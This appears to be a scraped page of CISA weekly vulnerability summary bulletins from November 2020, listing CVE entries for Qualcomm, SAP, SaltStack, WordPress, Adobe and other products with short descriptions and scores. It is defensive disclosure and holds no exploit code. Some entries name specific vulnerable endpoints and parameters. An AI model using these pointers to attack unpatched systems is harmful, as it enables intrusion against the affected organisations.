u’Null-pointer dereference can occur while accessing data buffer beyond its size that leads to access the buffer beyond its range’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in APQ8009, APQ8009W, APQ8017, APQ8053, APQ8064AU, APQ8096AU, APQ8098, MDM9206, MDM9650, MSM8909W, MSM8953, MSM8996AU, QCM4290, QCS405, QCS4290, QCS603, QCS605, QM215, QSM8350, SA6155, SA6155P, SA8155, SA8155P, SDA429W, SDA640, SDA660, SDA845, SDA855, SDM1000, SDM429, SDM429W, SDM450, SDM632, SDM640, SDM830, SDM845, SDW2500, SDX20, SDX20M, SDX50M, SDX55, SDX55M, SM4250, SM4250P, SM6115, SM6115P, SM6125, SM6250, SM6350, SM7125, SM7225, SM7250, SM7250P, SM8150, SM8150P, SM8250, SM8350, SM8350P, SXR2130, SXR2130P, WCD9330 2020-11-12 not yet calculated CVE-2020-11168
CONFIRM
qualcomm — multiple_snapdragon_products
 
u’When a non standard SIP sigcomp message is received from the network, then there may be chances of using more UDVM cycle or memory overflow’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables in APQ8009, APQ8017, APQ8037, APQ8053, MDM9250, MDM9607, MDM9628, MDM9640, MDM9650, MSM8108, MSM8208, MSM8209, MSM8608, MSM8905, MSM8909, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996AU, QCM4290, QCM6125, QCS410, QCS4290, QCS603, QCS605, QCS610, QCS6125, QM215, QSM8350, SA415M, SA6145P, SA6150P, SA6155P, SA8150P, SA8155, SA8155P, SA8195P, SC7180, SC8180X, SC8180X+SDX55, SC8180XP, SDA429W, SDA640, SDA660, SDA670, SDA845, SDA855, SDM1000, SDM429, SDM429W, SDM439, SDM450, SDM455, SDM630, SDM632, SDM636, SDM640, SDM660, SDM670, SDM710, SDM712, SDM845, SDM850, SDX24, SDX50M, SDX55, SDX55M, SM4125, SM4250, SM4250P, SM6115, SM6115P, SM6125, SM6150, SM6150P, SM6250, SM6250P, SM7125, SM7150, SM7150P, SM7250, SM7250P, SM8150, SM8150P, SM8350, SM8350P, SXR1120, SXR1130 2020-11-12 not yet calculated CVE-2020-3639
CONFIRM
rconfig — rconfig
 
lib/crud/userprocess.php in rConfig 3.9.x before 3.9.7 has an authentication bypass, leading to administrator account creation. This issue has been fixed in 3.9.7. 2020-11-13 not yet calculated CVE-2020-13638
MISC
readytalk — avian
 
** UNSUPPORTED WHEN ASSIGNED ** An issue was discovered in ReadyTalk Avian 1.2.0 before 2020-10-27. The FileOutputStream.write() method in FileOutputStream.java has a boundary check to prevent out-of-bounds memory read/write operations. However, an integer overflow leads to bypassing this check and achieving the out-of-bounds access. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. 2020-11-09 not yet calculated CVE-2020-28371
MISC
MISC
red_hat — jboss_keycloak A vulnerability was found in keycloak, where path traversal using URL-encoded path segments in the request is possible because the resources endpoint applies a transformation of the url path to the file path. Only few specific folder hierarchies can be exposed by this flaw 2020-11-09 not yet calculated CVE-2020-14366
CONFIRM
saltstack — salt
 
An issue was discovered in SaltStack Salt through 3002. Sending crafted web requests to the Salt API, with the SSH client enabled, can result in shell injection. 2020-11-06 not yet calculated CVE-2020-16846
SUSE
MISC
MISC
FEDORA
GENTOO
CONFIRM
saltstack — salt
 
The TLS module within SaltStack Salt through 3002 creates certificates with weak file permissions. 2020-11-06 not yet calculated CVE-2020-17490
SUSE
MISC
FEDORA
GENTOO
CONFIRM
saltstack — salt
 
In SaltStack Salt through 3002, salt-netapi improperly validates eauth credentials and tokens. A user can bypass authentication and invoke Salt SSH. 2020-11-06 not yet calculated CVE-2020-25592
SUSE
MISC
MISC
FEDORA
GENTOO
CONFIRM
sap — 3d_visual_enterprise_viewer
 
SAP 3D Visual Enterprise Viewer, version – 9, allows an user to open manipulated HPGL file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation. 2020-11-10 not yet calculated CVE-2020-26817
MISC
MISC
MISC
sap — as_abap
 
SAP AS ABAP(DMIS), versions – 2011_1_620, 2011_1_640, 2011_1_700, 2011_1_710, 2011_1_730, 2011_1_731, 2011_1_752, 2020 and SAP S4 HANA(DMIS), versions – 101, 102, 103, 104, 105, allows an authenticated attacker to inject arbitrary code into function module leading to code injection that can be executed in the application which affects the confidentiality, availability and integrity of the application. 2020-11-10 not yet calculated CVE-2020-26808
MISC
MISC
sap — commerce_cloud SAP Commerce Cloud (Accelerator Payment Mock), versions – 1808, 1811, 1905, 2005, allows an unauthenticated attacker to submit a crafted request over a network to a particular SAP Commerce module URL which will be processed without further interaction, the crafted request leads to Server Side Request Forgery attack which could lead to retrieval of limited pieces of information about the service with no impact on integrity or availability. 2020-11-10 not yet calculated CVE-2020-26811
MISC
MISC
sap — commerce_cloud
 
SAP Commerce Cloud (Accelerator Payment Mock), versions – 1808, 1811, 1905, 2005, allows an unauthenticated attacker to submit a crafted request over a network to a particular SAP Commerce module URL which will be processed without further interaction, the crafted request can render the SAP Commerce service itself unavailable leading to Denial of Service with no impact on confidentiality or integrity. 2020-11-10 not yet calculated CVE-2020-26810
MISC
MISC
sap — commerce_cloud
 
SAP Commerce Cloud, versions- 1808,1811,1905,2005, allows an attacker to bypass existing authentication and permission checks via the ‘/medias’ endpoint hence gaining access to Secure Media folders. This folder could contain sensitive files that results in disclosure of sensitive information and impact system configuration confidentiality. 2020-11-10 not yet calculated CVE-2020-26809
MISC
MISC
sap — erp_and_s/4_hana
 
SAP ERP and SAP S/4 HANA allows an authenticated user to see cost records to objects to which he has no authorization in PS reporting, leading to Missing Authorization check. 2020-11-10 not yet calculated CVE-2020-6316
MISC
MISC
sap — erp_client
 
SAP ERP Client for E-Bilanz, version – 1.0, installation sets Incorrect default filesystem permissions are set in its installation folder which allows anyone to modify the files in the folder. 2020-11-10 not yet calculated CVE-2020-26807
MISC
MISC
sap — fiori_launchpad
 
SAP Fiori Launchpad (News tile Application), versions – 750,751,752,753,754,755, allows an unauthorized attacker to send a crafted request to a vulnerable web application. It is usually used to target internal systems behind firewalls that are normally inaccessible to an attacker from the external network to retrieve sensitive / confidential resources which are otherwise restricted for internal usage only, resulting in a Server-Side Request Forgery vulnerability. 2020-11-10 not yet calculated CVE-2020-26815
MISC
MISC
sap — fiori_launchpad
 
SAP Fiori Launchpad (News tile Application), versions – 750,751,752,753,754,755, allows an unauthorized attacker to use SAP Fiori Launchpad News tile Application to send malicious code, to a different end user (victim), because News tile does not sufficiently encode user controlled inputs, resulting in Reflected Cross-Site Scripting (XSS) vulnerability. Information maintained in the victim’s web browser can be read, modified, and sent to the attacker. The malicious code cannot significantly impact the victim’s browser and the victim can easily close the browser tab to terminate it. 2020-11-13 not yet calculated CVE-2020-26825
MISC
MISC
sap — netweaver_as_abap
 
SAP NetWeaver AS ABAP (Web Dynpro), versions – 731, 740, 750, 751, 752, 753, 754, 755, 782, allows an authenticated user to access Web Dynpro components, that allows them to read and delete database logfiles because of Improper Access Control. 2020-11-10 not yet calculated CVE-2020-26819
MISC
MISC
sap — netweaver_as_abap
 
SAP NetWeaver AS ABAP (Web Dynpro), versions – 731, 740, 750, 751, 752, 753, 754, 755, 782, allows an authenticated user to access Web Dynpro components, which reveals sensitive system information that would otherwise be restricted to highly privileged users because of missing authorization, resulting in Information Disclosure. 2020-11-10 not yet calculated CVE-2020-26818
MISC
MISC
sap — process_integration
 
SAP Process Integration (PGP Module – Business-to-Business Add On), version – 1.0, allows an attacker to read PGP Keys under certain conditions in the PGP Module of Business-to-Business Add-On, these keys can then be used to read messages processed by the module leading to Information Disclosure. 2020-11-10 not yet calculated CVE-2020-26814
MISC
MISC
sentrifugo — sentrifugo In Sentrifugo 3.2, users can share an announcement under “Organization -> Announcements” tab. Also, in this page, users can upload attachments with the shared announcements. This “Upload Attachment” functionality is suffered from “Unrestricted File Upload” vulnerability so attacker can upload malicious files using this functionality and control the server. 2020-11-12 not yet calculated CVE-2020-26804
MISC
sentrifugo — sentrifugo In Sentrifugo 3.2, admin can edit employee’s informations via this endpoint –> /sentrifugo/index.php/empadditionaldetails/edit/userid/2. In this POST request, “employeeNumId” parameter is affected by SQLi vulnerability. Attacker can inject SQL commands into query, read data from database or write data into the database. 2020-11-12 not yet calculated CVE-2020-26805
MISC
sentrifugo — sentrifugo
 
In Sentrifugo 3.2, users can upload an image under “Assets -> Add” tab. This “Upload Images” functionality is suffered from “Unrestricted File Upload” vulnerability so attacker can upload malicious files using this functionality and control the server. 2020-11-12 not yet calculated CVE-2020-26803
MISC
set — set Prototype pollution vulnerability in ‘@strikeentco/set’ version 1.0.0 allows attacker to cause a denial of service and may lead to remote code execution. 2020-11-10 not yet calculated CVE-2020-28267
MISC
MISC
siemens — simatic_s7-300_cpu_family
 
A vulnerability has been identified in SIMATIC S7-300 CPU family (incl. related ET200 CPUs and SIPLUS variants) (All versions), SINUMERIK 840D sl (All versions). Sending multiple specially crafted packets to the affected devices could cause a Denial-of-Service on port 102. A cold restart is required to recover the service. 2020-11-12 not yet calculated CVE-2020-15783
MISC
spree — spree Spree is a complete open source e-commerce solution built with Ruby on Rails. In Spree from version 3.7 and before versions 3.7.13, 4.0.5, and 4.1.12, there is an authorization bypass vulnerability. The perpetrator could query the API v2 Order Status endpoint with an empty string passed as an Order token. This is patched in versions 3.7.11, 4.0.4, or 4.1.11 depending on your used Spree version. Users of Spree < 3.7 are not affected. 2020-11-13 not yet calculated CVE-2020-26223
MISC
CONFIRM
MISC
sugarcrm — sugarcrm
 
An authorization bypass and PHP local-file-include vulnerability in the installation component of SugarCRM before 8.0, 8.0 before 8.0.7, 9.0 before 9.0.4, and 10.0 before 10.0.0 allows for unauthenticated remote code execution against a configured SugarCRM instance via crafted HTTP requests. (This is exploitable even after installation is completed.). 2020-11-12 not yet calculated CVE-2020-7472
MISC
CONFIRM
suitecrm — suitecrm
 
SuiteCRM before 7.11.17 is vulnerable to remote code execution via the system settings Log File Name setting. In certain circumstances involving admin account takeover, logger_file_name can refer to an attacker-controlled .php file under the web root. 2020-11-06 not yet calculated CVE-2020-28328
MISC
MISC
MISC
synopsys — synopsys
 
Synopsys hub-rest-api-python (aka blackduck on PyPI) version 0.0.25 – 0.0.52 does not validate SSL certificates in certain cases. 2020-11-06 not yet calculated CVE-2020-27589
CONFIRM
MISC
MISC
MISC
MISC
tcl — android_smart_tvs
 
A vulnerability in the TCL Android Smart TV series V8-R851T02-LF1 V295 and below and V8-T658T01-LF1 V373 and below by TCL Technology Group Corporation allows an attacker on the adjacent network to arbitrarily browse and download sensitive files over an insecure web server running on port 7989 that lists all files & directories. An unprivileged remote attacker on the adjacent network, can download most system files, leading to serious critical information disclosure. 2020-11-10 not yet calculated CVE-2020-27403
MISC
MISC
MISC
MISC
tcl — android_smart_tvs
 
A vulnerability in the TCL Android Smart TV series V8-R851T02-LF1 V295 and below and V8-T658T01-LF1 V373 and below by TCL Technology Group Corporation allows a local unprivileged attacker, such as a malicious App, to read & write to the /data/vendor/tcl, /data/vendor/upgrade, and /var/TerminalManager directories within the TV file system. An attacker, such as a malicious APK or local unprivileged user could perform fake system upgrades by writing to the /data/vendor/upgrage folder. 2020-11-10 not yet calculated CVE-2020-28055
MISC
MISC
MISC
MISC
MISC
tibco — tibco_iprocess_workspace
 
The Core component of TIBCO Software Inc.’s TIBCO iProcess Workspace (Browser) contains a vulnerability that theoretically allows an unauthenticated attacker with network access to execute a Cross Site Request Forgery (CSRF) attack on the affected system. A successful attack using this vulnerability requires human interaction from an authenticated user other than the attacker. Affected releases are TIBCO Software Inc.’s TIBCO iProcess Workspace (Browser): versions 11.6.0 and below. 2020-11-10 not yet calculated CVE-2020-27146
CONFIRM
CONFIRM
tmux — tmux
 
The function input_csi_dispatch_sgr_colon() in file input.c contained a stack-based buffer-overflow that can be exploited by terminal output. 2020-11-06 not yet calculated CVE-2020-27347
MISC
GENTOO
MISC
touchbase.ai — touchbase.ai

 

toucbase.ai before version 2.0 leaks information by not stripping exif data from images. Anyone with access to the uploaded image of other users could obtain its geolocation, device, and software version data etc (if present. The issue is fixed in version 2.0. 2020-11-11 not yet calculated CVE-2020-26220
MISC
CONFIRM
touchbase.ai — touchbase.ai

 

touchbase.ai before version 2.0 is vulnerable to Cross-Site Scripting (XSS). The vulnerability allows an attacker to send malicious JavaScript code which could result in hijacking of the user’s cookie/session tokens, redirecting the user to a malicious webpage and performing unintended browser action. The issue is patched in version 2.0. 2020-11-11 not yet calculated CVE-2020-26221
CONFIRM
touchbase.ai — touchbase.ai
 
touchbase.ai before version 2.0 is vulnerable to Open Redirect. Impacts can be many, and vary from theft of information and credentials, to the redirection to malicious websites containing attacker-controlled content, which in some cases even cause XSS attacks. So even though an open redirection might sound harmless at first, the impacts of it can be severe should it be exploitable. The issue is fixed in version 2.0. 2020-11-11 not yet calculated CVE-2020-26219
CONFIRM
touchbase.ai — touchbase.ai
 
touchbase.ai before version 2.0 is vulnerable to Cross-Site Scripting. The vulnerability allows an attacker to inject HTML payloads which could result in defacement, user redirection to a malicious webpage/website etc. The issue is patched in version 2.0. 2020-11-11 not yet calculated CVE-2020-26218
CONFIRM
tp-link — archer_a7_ac1750_devices
 
tdpServer on TP-Link Archer A7 AC1750 devices before 201029 allows remote attackers to execute arbitrary code via the slave_mac parameter. NOTE: this issue exists because of an incomplete fix for CVE-2020-10882 in which shell quotes are mishandled. 2020-11-08 not yet calculated CVE-2020-28347
MISC
MISC
MISC
MISC
MISC
trend_micro — interscan_messaging_security_virtual_appliance
 
Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 is vulnerable to a server side request forgery vulnerability which could allow an authenticated attacker to abuse the product’s web server and grant access to web resources or parts of local files. An attacker must already have obtained authenticated privileges on the product to exploit this vulnerability. 2020-11-09 not yet calculated CVE-2020-27018
N/A
N/A
trend_micro — interscan_messaging_security_virtual_appliance
 
Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 is vulnerable to an information disclosure vulnerability which could allow an attacker to access a specific database and key. 2020-11-09 not yet calculated CVE-2020-27019
N/A
N/A
trend_micro — interscan_messaging_security_virtual_appliance
 
Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 has updated a specific critical library that may vulnerable to attack. 2020-11-09 not yet calculated CVE-2020-27694
N/A
N/A
trend_micro — interscan_messaging_security_virtual_appliance
 
Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 is vulnerable to a cross-site request forgery (CSRF) vulnerability which could allow an attacker to modify policy rules by tricking an authenticated administrator into accessing an attacker-controlled web page. An attacker must already have obtained product administrator/root privileges to exploit this vulnerability. 2020-11-09 not yet calculated CVE-2020-27016
N/A
N/A
trend_micro — interscan_messaging_security_virtual_appliance
 
Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 is vulnerable to an XML External Entity Processing (XXE) vulnerability which could allow an authenticated administrator to read arbitrary local files. An attacker must already have obtained product administrator/root privileges to exploit this vulnerability. 2020-11-09 not yet calculated CVE-2020-27017
N/A
N/A
trend_micro — interscan_messaging_security_virtual_appliance
 
Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 stores administrative passwords using a hash that is considered outdated. 2020-11-09 not yet calculated CVE-2020-27693
N/A
N/A
untangle — firewall_ng Untangle Firewall NG before 16.0 uses MD5 for passwords. 2020-11-12 not yet calculated CVE-2020-17494
MISC
MISC
MISC
MISC
valve — game_networking_sockets Valve’s Game Networking Sockets prior to version v1.2.0 improperly handles inlined statistics messages in function CConnectionTransportUDPBase::Received_Data(), leading to an exception thrown from libprotobuf and resulting in a crash. 2020-11-13 not yet calculated CVE-2020-6019
MISC
vivo — fame_touch_module
 
The frame touch module does not make validity judgments on parameter lengths when processing specific parameters,which caused out of the boundary when memory access.The vulnerability eventually leads to a local DOS on the device. 2020-11-10 not yet calculated CVE-2020-12485
CONFIRM
vmware — tanzu_tas
 
Scheduler for TAS prior to version 1.4.0 was permitting plaintext transmission of UAA client token by sending it over a non-TLS connection. This also depended on the configuration of the MySQL server which is used to cache a UAA client token used by the service. If intercepted the token can give an attacker admin level access in the cloud controller. 2020-11-11 not yet calculated CVE-2020-5426
CONFIRM
wordpress — wordpress
 
The Canto plugin 1.3.0 for WordPress allows includes/lib/download.php?subdomain= SSRF. 2020-11-10 not yet calculated CVE-2020-24063
MISC
MISC
MISC
MISC
wordpress — wordpress
 
An unauthenticated SQL Injection vulnerability in Good Layers LMS Plugin <= 2.1.4 exists due to the usage of “wp_ajax_nopriv” call in WordPress, which allows any unauthenticated user to get access to the function “gdlr_lms_cancel_booking” where POST Parameter “id” was sent straight into SQL query without sanitization. 2020-11-12 not yet calculated CVE-2020-27481
MISC
wordpress — wordpress
 
The usc-e-shop (aka Collne Welcart e-Commerce) plugin before 1.9.36 for WordPress allows Object Injection because of usces_unserialize. There is not a complete POP chain. 2020-11-07 not yet calculated CVE-2020-28339
MISC
MISC
xen — xen Xen through 4.14.x allows guest OS administrators to obtain sensitive information (such as AES keys from outside the guest) via a side-channel attack on a power/energy monitoring interface, aka a “Platypus” attack. NOTE: there is only one logically independent fix: to change the access control for each such interface in Xen. 2020-11-10 not yet calculated CVE-2020-28368
MISC
MISC
MISC

Back to top

This product is provided subject to this Notification and this Privacy & Use policy.

Categories
alerts

Vulnerability Summary for the Week of November 2, 2020

Original release date: November 9, 2020

The CISA Weekly Vulnerability Summary Bulletin is created using information from the NIST NVD. In some cases, the vulnerabilities in the Bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available.

 

High Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
adobe — acrobat Adobe Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a local privilege escalation vulnerability that could enable a user without administrator privileges to delete arbitrary files and potentially execute arbitrary code as SYSTEM. Exploitation of this issue requires an attacker to socially engineer a victim, or the attacker must already have some access to the environment. 2020-11-05 9.3 CVE-2020-24433
MISC
google — chrome Heap buffer overflow in UI in Google Chrome on Windows prior to 86.0.4240.183 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. 2020-11-03 7.5 CVE-2020-16011
SUSE
SUSE
MISC
MISC
qnap — music_station If exploited, this command injection vulnerability could allow remote attackers to execute arbitrary commands. This issue affects: QNAP Systems Inc. Music Station versions prior to 5.1.13; versions prior to 5.2.9; versions prior to 5.3.11. 2020-11-02 7.5 CVE-2018-19950
CONFIRM
qualcomm — agatti_firmware u’Buffer overflow occurs while processing SIP message packet due to lack of check of index validation before copying into it’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables in Agatti, APQ8053, APQ8096AU, APQ8098, Bitra, Kamorta, MSM8905, MSM8909W, MSM8917, MSM8940, MSM8953, MSM8996AU, MSM8998, Nicobar, QCA6390, QCA6574AU, QCM2150, QCS605, QM215, Rennell, SA6155P, SA8155P, Saipan, SDA660, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130 2020-11-02 10 CVE-2020-3654
CONFIRM
MISC
qualcomm — agatti_firmware u’While processing invalid connection request PDU which is nonstandard (interval or timeout is 0) from central device may lead peripheral system enter into dead lock state.(This CVE is equivalent to InvalidConnectionRequest(CVE-2019-19193) mentioned in sweyntooth paper)’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wired Infrastructure and Networking in Agatti, APQ8009, APQ8017, APQ8053, AR9344, Bitra, IPQ5018, Kamorta, MDM9607, MDM9640, MDM9650, MSM8996AU, Nicobar, QCA6174A, QCA6390, QCA6574AU, QCA9377, QCA9886, QCM6125, QCN7605, QCS404, QCS405, QCS605, QCS610, QRB5165, Rennell, SA415M, SA515M, Saipan, SC7180, SC8180X, SDA845, SDM660, SDM670, SDM710, SDM845, SDM850, SDX20, SDX24, SDX55, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130 2020-11-02 7.8 CVE-2020-3704
CONFIRM
MISC
qualcomm — agatti_firmware u’Due to an incorrect SMMU configuration, the modem crypto engine can potentially compromise the hypervisor’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wired Infrastructure and Networking in Agatti, Bitra, Kamorta, Nicobar, QCA6390, QCS404, QCS605, QCS610, Rennell, SA415M, SA515M, SA6155P, SA8155P, Saipan, SC7180, SC8180X, SDA845, SDM670, SDM710, SDM845, SDM850, SDX24, SDX55, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130 2020-11-02 7.2 CVE-2020-3690
CONFIRM
MISC
qualcomm — agatti_firmware u’Possible buffer overflow while updating output buffer for IMEI and Gateway Address due to lack of check of input validation for parameters received from server’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile in Agatti, Kamorta, Nicobar, QCM6125, QCS610, Rennell, SA415M, Saipan, SC7180, SC8180X, SDX24, SDX55, SM6150, SM7150, SM8150, SM8250, SXR2130 2020-11-02 10 CVE-2020-3692
CONFIRM
MISC
qualcomm — agatti_firmware u’Buffer overflow can happen as part of SIP message packet processing while storing values in array due to lack of check to validate the index length’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables in Agatti, APQ8053, APQ8096AU, APQ8098, Bitra, Kamorta, MSM8905, MSM8909W, MSM8917, MSM8940, MSM8953, MSM8996AU, Nicobar, QCA6390, QCA6574AU, QCM2150, QCS605, QM215, Rennell, SA6155P, SA8155P, Saipan, SDA660, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130 2020-11-02 10 CVE-2020-3673
CONFIRM
MISC
qualcomm — apq8009_firmware u’Remote code execution can happen by sending a carefully crafted POST query when Device configuration is accessed from a tethered client through webserver due to lack of array bound check.’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking in APQ8009, APQ8017, APQ8053, APQ8096AU, APQ8098, IPQ4019, IPQ6018, IPQ8064, IPQ8074, MDM9150, MDM9206, MDM9207C, MDM9607, MDM9640, MDM9650, MSM8905, MSM8909W, MSM8953, MSM8996AU, QCA6574AU, QCS405, QCS610, QRB5165, SC8180X, SDA660, SDA845, SDM429, SDM429W, SDM630, SDM632, SDM636, SDM660, SDM845, SDX20, SDX24, SDX55, SM8250 2020-11-02 10 CVE-2020-3657
CONFIRM
MISC
qualcomm — apq8009_firmware u’Buffer overflow while processing PDU packet in bluetooth due to lack of check of buffer length before copying into it.’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wired Infrastructure and Networking in APQ8009, APQ8053, QCA6390, QCN7605, QCN7606, SA415M, SA515M, SA6155P, SA8155P, SC8180X, SDX55 2020-11-02 8.3 CVE-2020-11155
CONFIRM
MISC
qualcomm — apq8009_firmware u’Buffer overflow while processing a crafted PDU data packet in bluetooth due to lack of check of buffer size before copying’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wired Infrastructure and Networking in APQ8009, APQ8053, QCA6390, QCN7605, QCN7606, SA415M, SA515M, SA6155P, SA8155P, SC8180X, SDX55 2020-11-02 8.3 CVE-2020-11154
CONFIRM
MISC
qualcomm — apq8053_firmware u’Buffer over-read issue in Bluetooth peripheral firmware due to lack of check for invalid opcode and length of opcode received from central device(This CVE is equivalent to Link Layer Length Overfow issue (CVE-2019-16336,CVE-2019-17519) and Silent Length Overflow issue(CVE-2019-17518) mentioned in sweyntooth paper)’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music in APQ8053, APQ8076, AR9344, Bitra, Kamorta, MDM9206, MDM9207C, MDM9607, MSM8905, MSM8917, MSM8937, MSM8940, MSM8953, Nicobar, QCA6174A, QCA9377, QCM2150, QCM6125, QCS404, QCS405, QCS605, QCS610, QM215, Rennell, SC8180X, SDM429, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SDX20, SDX24, SM6150, SM7150, SM8150, SXR1130 2020-11-02 7.5 CVE-2020-3703
CONFIRM
MISC
qualcomm — apq8053_firmware u’Out of bound memory access while processing GATT data received due to lack of check of pdu data length and leads to remote code execution’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile in APQ8053, QCA6390, QCA9379, QCN7605, SC8180X, SDX55 2020-11-02 10 CVE-2020-11153
CONFIRM
MISC
qualcomm — ipq4019_firmware u’fscanf reads a string from a file and stores its contents on a statically allocated stack memory which leads to stack overflow’ in Snapdragon Wired Infrastructure and Networking in IPQ4019, IPQ6018, IPQ8064, IPQ8074, QCA9531, QCA9980 2020-11-02 7.5 CVE-2020-11172
CONFIRM
MISC
whatsapp — whatsapp A use-after-free in a logging library in WhatsApp for iOS prior to v2.20.111 and WhatsApp Business for iOS prior to v2.20.111 could have resulted in memory corruption, crashes and potentially code execution. This could have happened only if several events occurred together in sequence, including receiving an animated sticker while placing a WhatsApp video call on hold. 2020-11-03 7.5 CVE-2020-1909
CONFIRM
wordpress — wordpress WordPress before 5.5.2 mishandles deserialization requests in wp-includes/Requests/Utility/FilteredIterator.php. 2020-11-02 7.5 CVE-2020-28032
MISC
MLIST
MISC
MISC
DEBIAN
wordpress — wordpress WordPress before 5.5.2 allows attackers to gain privileges via XML-RPC. 2020-11-02 7.5 CVE-2020-28035
MLIST
MISC
DEBIAN
wordpress — wordpress wp-includes/class-wp-xmlrpc-server.php in WordPress before 5.5.2 allows attackers to gain privileges by using XML-RPC to comment on a post. 2020-11-02 7.5 CVE-2020-28036
MISC
MLIST
MISC
MISC
DEBIAN
wordpress — wordpress is_blog_installed in wp-includes/functions.php in WordPress before 5.5.2 improperly determines whether WordPress is already installed, which might allow an attacker to perform a new installation, leading to remote code execution (as well as a denial of service for the old installation). 2020-11-02 7.5 CVE-2020-28037
MISC
MLIST
MISC
MISC
DEBIAN

Back to top

 

Medium Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
adobe — acrobat Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) for macOS are affected by a signature verification bypass that could result in local privilege escalation. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2020-11-05 6.8 CVE-2020-24429
MISC
adobe — acrobat Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a use-after-free vulnerability that could result in a memory address leak. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2020-11-05 4.3 CVE-2020-24438
MISC
adobe — acrobat Acrobat Reader versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by an input validation vulnerability when decoding a crafted codec that could result in the disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2020-11-05 4.3 CVE-2020-24427
MISC
adobe — acrobat Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) for macOS are affected by a time-of-check time-of-use (TOCTOU) race condition vulnerability that could result in local privilege escalation. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2020-11-05 5.1 CVE-2020-24428
MISC
adobe — acrobat Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) for macOS are affected by a security feature bypass that could result in dynamic library code injection by the Adobe Reader process. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2020-11-05 5.8 CVE-2020-24431
MISC
adobe — acrobat Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2020-11-05 4.3 CVE-2020-24434
MISC
